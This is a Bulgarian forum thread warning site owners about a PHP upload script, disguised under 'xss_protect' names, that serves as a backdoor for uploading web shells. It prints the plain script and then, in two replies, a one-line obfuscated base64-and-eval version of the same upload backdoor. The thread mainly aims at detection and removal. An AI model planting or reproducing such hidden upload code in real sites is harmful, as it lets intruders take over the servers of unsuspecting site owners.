[Guide] How to remove Paskal`s Upload Script

[NikeR]

Искам да сложа един скрип, който можеби доста от вас използват, мислейки го за защита.
Всъщност това е Ъплоад скрипт и могат да ви слагат шелове в уебовете.
Най вече беше в моя уеб.
Тва е най простия начин по който можете да бъдете хакнати, не е голямо чудо,
но все пак ще изгубите повечко време на човека решил да ви хаква.

<?php
$xss_protect = "./";
if (isset($_POST["xss_security"])) {
$xss = $_FILES['file'];
foreach ($xss['name'] as $idx=>$file){
$xss_name = $xss['name'][$idx];
$xss_name = strtolower($xss_name);
$xss_name = preg_replace('/[^a-z0-9_.]/i', '', $xss_name);
$xss_size= intval($xss['size'][$idx]);
$xss_file = $xss['tmp_name'][$idx];
$copy = copy($xss_file,$xss_protect.$xss_name);
if($copy) { echo ("Successfully!<br />\n"); }
if(!$copy && $file_name != '') { echo ("<b>Error!<br />\n"); }
}echo ("<a href='$xss_name'>Continue...</a>");}
?>

Надявам се да съм бил полезен.

 

[Bupyc™]

ХАХАХАХ брао ники

 

[pafa7a]

10/10 Thanks

 

[Mortred]

мен Mephisto ме просветна точно за това, и като видях това

$xss_protect = "./";
if (isset($_POST["xss_security"])) {
$xss = $_FILES['file'];
foreach ($xss['name'] as $idx=>$file){

ми стано ясно ;] незнам Bupyc дали се сещаш в скайп ти бях казал за това

 

[ludlud]

Мерси лиско

 

[NikeR]

Видите ли това:
$_FILES['нещо'];
имайте предвид че е Ъплоад

 

[ludlud]

добре че каза

 

[ludaka]

10/10

 

[EvoLuTioN]

То скрипта дет ъплоадва го иаме само 3-4 човека тъй че само големите сървари са хаквани от него(доколкото знам) ама то ако са решили да ви хакват на 100% махането на тоя скрипт няма да ви спаси тия $_GET шитс и xss които повечето сайтове имат много лесно някой по разбиращ може да ви гътне!Но се пак браво

 

[FeliXcat]

Преди време ми го казаха... доста гаден script
Иначе thx за тфа $_FILES
Ще взема да потърся

 

[NikeR]

Когат не са занимаах паскала го беше набутал в ескейп уеба навсякъде...
и зе че релейсна уеба и всички дето се опитваха да го ползват можеше да ги хакне. Браво че е направил тоя скрипт, не се и съмнявам, че си е играл бая въпреки, че е лесен скрипта... щото като видях как ми е едитнал уеба, нищо чудно, че и не го ползвате повечето от вас...
Щото не бачкаше. Та както и да е като го видите тва с $_FILES, значи е ъплоад . Иначе Evolution е прав, само дето ще им отнеме повече време, няма да е лесно хоп с ъплоадчето

 

[lubo55]

Като гледам скрипта ми прилича на How to make it easier to upload Pascal

 

[Shaker]

така де..ти караш хората да го сложат или да го махнат?нещо не можах да ти хвана целия смисъл от написаното...
малко сме хората които имаме тоя скрипт.така,че..все едно =)

 

[sNG]

така де..ти караш хората да го сложат или да го махнат?нещо не можах да ти хвана целия смисъл от написаното...
малко сме хората които имаме тоя скрипт.така,че..все едно =)

да не е пък много сложен ?

 

[Shaker]

да не е пък много сложен ?

опитай се да го направиш.

 

[sugaR]

опитай се да го направиш.

+1 по темата браво

 

[Damian]

най-лесният начин да се неутрализира този скрипт е просто да си изключите ъплоуда.

 

[PaskaL]

Много ми е интересно ако реша да ви го кодирам т.н от вас $_Files със други променливи и го събера целия скрипт в 1 ред
ще се усетите ли ... а колкото Дамяне до изключване на Ъплоада , спокойно мога да ти сайвна файл и от sql

 

[strsup]

опитай се да го направиш.

<?php define('no_xss_code', implode('', array('bW','92ZV','91c','GxvYWRlZ','F9maWxlKC','RfRklMRVNbJ3','hzcyddW','yd','0b','XB','fb','mF','tZ','Sd','dL','CA','kX','0Z','JTE','VTW','yd','4','c3Mn','XVsn','bmFt','ZSdd','KT','s')).'=');
@eval(chr(98).chr(97).chr(115).chr(101).(64).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101)."(constant('no_xss_code'));");>

Yes, I can !!

 

[Life]

<?php define('no_xss_code', implode('', array('bW','92ZV','91c','GxvYWRlZ','F9maWxlKC','RfRklMRVNbJ3','hzcyddW','yd','0b','XB','fb','mF','tZ','Sd','dL','CA','kX','0Z','JTE','VTW','yd','4','c3Mn','XVsn','bmFt','ZSdd','KT','s')).'=');
@eval(chr(98).chr(97).chr(115).chr(101).(64).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101)."(constant('no_xss_code'));");>

Само дето променливите не са като хората